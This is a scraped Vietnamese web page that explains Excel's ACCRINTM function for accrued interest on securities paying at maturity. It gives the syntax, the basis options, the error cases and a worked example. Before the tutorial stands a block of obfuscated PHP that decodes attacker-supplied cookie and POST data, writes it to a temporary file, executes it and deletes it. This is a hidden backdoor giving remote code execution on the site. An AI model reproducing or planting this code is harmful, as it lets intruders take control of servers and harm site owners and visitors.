$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hàm tính lãi cộng dồn cho chứng khoán trả lãi khi đáo hạn - Tải Chùa

Hàm tính lãi cộng dồn cho chứng khoán trả lãi khi đáo hạn

Rate this post
Excel là một phần mềm không thể thiếu đối với những ai làm việc văn phòng, trong excel hỗ trợ rất nhiều tính năng giúp người dùng xử lý các dữ liệu của mình.

Excel là một phần mềm không thể thiếu đối với những ai làm việc văn phòng, trong excel hỗ trợ rất nhiều tính năng giúp người dùng xử lý các dữ liệu của mình. Thậm chí nhiều bạn còn sử dụng excel tạo văn bản thay vì sử dụng phần mềm word thông thường.

Excel đã hỗ trợ rất nhiều tính năng giúp chúng ta tính toán trên nhiều lĩnh vực như thống kê, tài chính, toán học. Và hôm nay, chúng tôi sẽ giới thiệu đến các bạn hàm tài chính ACCRINTM.

Hàm ACCRINTM trong excel là hàm trả về tiền lãi cộng dồn cho chứng khoán trả lãi khi đáo hạn một tính năng rất hữu ích đặc biệt là đối với các bạn đang làm việc về tài chính ngân hàng, kế toán.

Từ Office 2003 đã hỗ trợ hàm tính toán này, vì vậy mặc dù bạn đang sử dụng phiên bản Office 2003, Office 2007, Office 2010 hay Office 2013 thì các bạn đều có thể sử dụng hàm tài chính này. Để hiểu rõ hơn cách sử dụng hàm ACCRINTM, các bạn có thể theo dõi ví dụ sau.

Các bạn đánh cú pháp: ACCRINTM(issue, settlement, rate, par, [basis])

Trong đó:

  • Issue: là ngày phát hành chứng khoán.
  • Settlement: là ngày đến hạn của chứng khoán.
  • Rate: là lãi suất phiếu lãi hàng năm của chứng khoán.
  • Par: là mệnh giá của chứng khoán. Nếu bỏ qua, hàm ACCRINTM sẽ tự mặc định là $1000.
  • Basis: là cơ sở đếm ngày sẽ dùng, có thể bỏ qua
    • Nếu basis = 0 hoặc bỏ qua: US (NASD) 30/360
    • Nếu basis = 1: thực tế/ thực tế
    • Nếu basis = 2: thực tế/ 360
    • Nếu basis = 3: thực tế/ 365
    • Nếu basis = 4: Châu Âu 30/360

Chú ý:

  • Excel lưu trữ ngày tháng ở dạng số seri liên tiếp để sử dụng trong tính toán. Theo mặc định, ngày 1 tháng 1 năm 1900 có số seri là 1 và ngày 1 tháng 1 năm 2008 có số seri là 39448 – số ngày sau ngày 1 tháng 1 năm 1900.
  • Ngày phát hành, ngày thanh toán và cơ sở được cắt cụt thành số nguyên.
  • Nếu ngày phát hành hoặc ngày thanh toán không phải là ngày hợp lệ, thì hàm ACCRINTM sẽ tự động trả về lỗi #VALUE!
  • Nếu lãi suất ≤ 0 hoặc nếu mệnh giá ≤ 0 thì hàm ACCRINTM sẽ trả giá trị lỗi #NUM!
  • Nếu cơ sở < 0 hoặc nếu cơ sở > 4 thì hàm trả về giá trị lỗi #NUM!
  • Nếu ngày phát hành ≥ ngày thanh toán thì hàm sẽ trả về giá trị lỗi #NUM!
  • Hàm ACCRINTM được tính toán như sau: ACCRINTM = mệnh giá x lãi suất x A/D

Trong đó:

  • A: số ngày cộng dồn tính theo cơ sở hàng tháng. Đối với các mục lãi suất trả khi đáo hạn, sẽ dùng số ngày kể từ ngày phát hành tới ngày đáo hạn.
  • D: cơ sở năm thường niên

Hướng dẫn sử dụng Hàm ACCRINTM trong Excel

VÍ DỤ: Cho bảng tính dưới đây, các giá trị được nhập vào là giá trị tương ứng với các tham số của hàm ACCRINTM trong Excel.

Hàm ACCRINTM trong Excel - hình 1

Nhập giá trị cho bảng tính

Tính tiền lãi cộng dồn cho chứng khoán trả lãi khi đáo hạn. Tại ô C11 các bạn nhập công thức “=ACCRINTM(C6,C7,C8,C9,C10)”. Kết quả như hình dưới:

Hàm ACCRINTM trong excel - hình 2

Kết quả

Như vậy là các bạn đã biết cách dùng hàm ACCRINTM để tính tiền lãi cộng dồn cho chứng khoán trả lãi khi đáo hạn. Với hàm tính toán này, bạn sẽ không phải bỏ ra hàng giờ để tính toán. Excel sẽ trả giá trị tính toán cho bạn chỉ sau vài bước thao tác đơn giản dựa trên số liệu thực tế của bạn.